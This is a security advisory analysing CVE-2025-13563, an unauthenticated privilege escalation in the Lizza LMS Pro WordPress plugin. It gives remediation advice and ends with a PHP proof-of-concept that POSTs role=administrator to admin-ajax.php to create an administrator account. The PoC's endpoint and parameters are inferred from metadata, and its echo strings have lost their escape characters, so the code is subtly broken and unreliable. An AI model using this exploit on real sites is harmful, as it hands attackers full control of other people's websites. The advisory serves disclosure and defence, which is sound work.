Atomic Edge analysis of CVE-2025-13563 (metadata-based):
The Lizza LMS Pro plugin for WordPress contains an unauthenticated privilege escalation vulnerability. The flaw exists in the user registration function, allowing attackers to assign themselves the administrator role during account creation. This vulnerability has a CVSS score of 9.8, indicating critical severity.
CWE-269, Improper Privilege Management, directly points to a missing capability or role check. The vulnerability description specifies the ‘lizza_lms_pro_register_user_front_end’ function does not restrict user roles during registration. Atomic Edge research infers the function processes user-supplied registration data, likely from a front-end form or AJAX handler, and directly assigns the role from a request parameter without validation. This conclusion is inferred from the CWE and description, as no source code is available for confirmation.
Exploitation requires an unauthenticated attacker to send a crafted HTTP request to the plugin’s user registration endpoint. The endpoint is likely the WordPress AJAX handler at /wp-admin/admin-ajax.php with the action parameter set to ‘lizza_lms_pro_register_user_front_end’. The payload must include user registration fields like ‘user_login’, ‘user_email’, and a ‘role’ parameter set to ‘administrator’. Attackers may also need to bypass or provide a valid nonce if the function includes one, but the vulnerability description suggests role assignment occurs without proper authorization checks.
Effective remediation requires the plugin to implement a server-side role validation check. The patched version should enforce a default role, such as ‘subscriber’, for all front-end registrations. The function must discard any user-supplied role parameter. The fix should also incorporate a capability check, like ‘current_user_can(‘promote_users’)’, if role assignment is intended for administrative users only. This aligns with WordPress security best practices for privilege management.
Successful exploitation grants an unauthenticated attacker full administrative access to the WordPress site. Attackers can create, modify, or delete any content, install malicious plugins or themes, manipulate user accounts, and potentially achieve remote code execution by editing theme files or plugin code. This compromises the entire site’s confidentiality, integrity, and availability.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-13563 - Lizza LMS Pro <= 1.0.3 - Unauthenticated Privilege Escalation
<?php
/**
* Proof of Concept for CVE-2025-13563.
* Assumptions based on metadata:
* 1. The plugin uses an AJAX handler for front-end registration.
* 2. The AJAX action is 'lizza_lms_pro_register_user_front_end'.
* 3. The handler accepts a 'role' parameter which is not validated.
* 4. No authentication or nonce is required for this action (inferred from 'unauthenticated').
*/
$target_url = 'https://target-site.com'; // CHANGE THIS
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
// Generate unique credentials to avoid conflict with existing users.
$username = 'atomic_edge_' . bin2hex(random_bytes(4));
$email = $username . '@example.com';
$password = 'AtomicEdgePoc2025!';
$post_data = [
'action' => 'lizza_lms_pro_register_user_front_end', // Inferred AJAX action from function name.
'user_login' => $username,
'user_email' => $email,
'user_pass' => $password,
'role' => 'administrator' // The malicious payload to escalate privileges.
// Other parameters like 'first_name' may be required but are omitted for brevity.
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable for testing environments only.
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "[*] Target: $target_urln";
echo "[*] Sending payload to AJAX endpoint...n";
echo "[*] HTTP Code: $http_coden";
echo "[*] Response: $responsen";
echo "nIf successful, an administrator account with credentials:n";
echo "Username: $usernamen";
echo "Password: $passwordn";
echo "Email: $emailn";
echo "should be created. Attempt to log in at $target_url/wp-login.phpn";
?>
